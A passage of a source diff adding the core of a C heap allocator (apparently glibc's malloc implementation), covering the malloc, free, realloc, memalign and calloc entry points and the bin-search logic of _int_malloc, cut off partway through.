+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  if (!checked_request2size (bytes, &tbytes))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      && tcache
+      && tcache->counts[tc_idx] > 0)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes;
+  /* ALIGN_UP with overflow check.  */
+  if (__glibc_unlikely (__builtin_add_overflow (bytes,
+						pagesize - 1,
+						&rounded_bytes)))
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+  rounded_bytes = rounded_bytes & -(pagesize - 1);
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+  ptrdiff_t bytes;
+
+  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
+    {
+       __set_errno (ENOMEM);
+       return NULL;
+    }
+  sz = bytes;
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size returns false for request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                      if (bck->fd != fwd)
+                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
